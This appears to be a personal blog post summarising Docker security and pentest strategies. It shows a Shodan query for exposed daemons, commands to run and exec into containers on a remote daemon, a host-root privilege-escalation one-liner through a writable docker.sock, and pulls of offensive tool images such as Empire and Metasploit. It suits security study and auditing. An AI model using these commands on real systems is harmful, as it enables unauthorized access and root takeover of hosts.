intro

Docker is a popular technology adopted by many organizations in their cloud services. This case study is a summary of docker security and pentest strategies.

Docker arch

Docker adopts a client-server architecture with the following main components:

• Docker Daemon: manages docker object such as network, volume, docker image & container.
• Docker API: an interface between Daemon and CLI to communicate with each other via Unix or TCP socket.
• Docker CLI: a command-line interface used to execute the command to pull, run and build the docker image.

By default, CLI communiates with Daemon on local loopback via a unix socket. You may also bind the Daemon to TC port s 2375, 2376, 2377 for remote connection (this is dangerous). Many vulnerable setups like this can be found on shodan: port:2375 product:"docker"

exploiting Docker Daemon directly

To expose docker Daemon via TCP, this can be done by modifying /lib/systemd/system/docker.service

# add the following to ExecStart
-H=tcp://0.0.0.0:2375

# then save and restart the Daemon

One can connect to the Daemon via

> docker -H <remote host ip> :<port> <docker-command>

# to get the version
> docker -H <target>:2375 version

# get a list of available images
> docker -H <target>:2375 images

# see running processes
docker -H <target>:2375 ps -a

# connect to a container by id
docker -H <target>:2375 exec -it <container-id> /bin/sh

automated tools for docker security assessment

Both of the following are scripts/tools for automating the assessment of docker security

• https://github.com/stealthcopter/deepce
• https://github.com/quay/clair

Both provide static analysis of the docker image and reports vulnerabilities in them.

Additionally, CIS has a benchmarking programm for docker. This can also be achieved via their provided dockoer image to conduct an audit on your docker setup.

> docker run -it --net host --pid host --userns host --cap-add audit_control \
 -e DOCKER_CONTENT_TRUST=$DOCKER_CONTENT_TRUST \
 -v /etc:/etc:ro \
 -v /usr/bin/containerd:/usr/bin/containerd:ro \
 -v /usr/bin/runc:/usr/bin/runc:ro \
 -v /usr/lib/systemd:/usr/lib/systemd:ro \
 -v /var/lib:/var/lib:ro \
 -v /var/run/docker.sock:/var/run/docker.sock:ro \
 --label docker_bench_security \
 docker/docker-bench-security

using docker for pentest

Many pentest tools are built as docker containers such as namp, sqlmap, wpscan, impacket, metasploit etc. Out of all, i personally think the most convenient build is empire, which had been output maintenance for a while and was more difficult to setup. But this available as a docker image.

> docker pull instrumentisto/nmap
> docker pull hypnza/dirbuster
> docker pull googlesky/sqlmap
> docker pull bcsecurity/empire
> docker pull rflathers/impacket
> docker pull metasploitframework/metasploit-framework

commonly exploited docker misconfig

Writable sock: https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket

# check which image is available
> docker images
# PE via the image
> docker -H unix:///var/run/docker.sock run -v /:/host -it {image_name} chroot /host /bin/bash

Curl can be used with a Unix socket to talk to the Docker daemon

# https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25
> curl --unix-socket /var/run/docker.sock http://localhost/images/json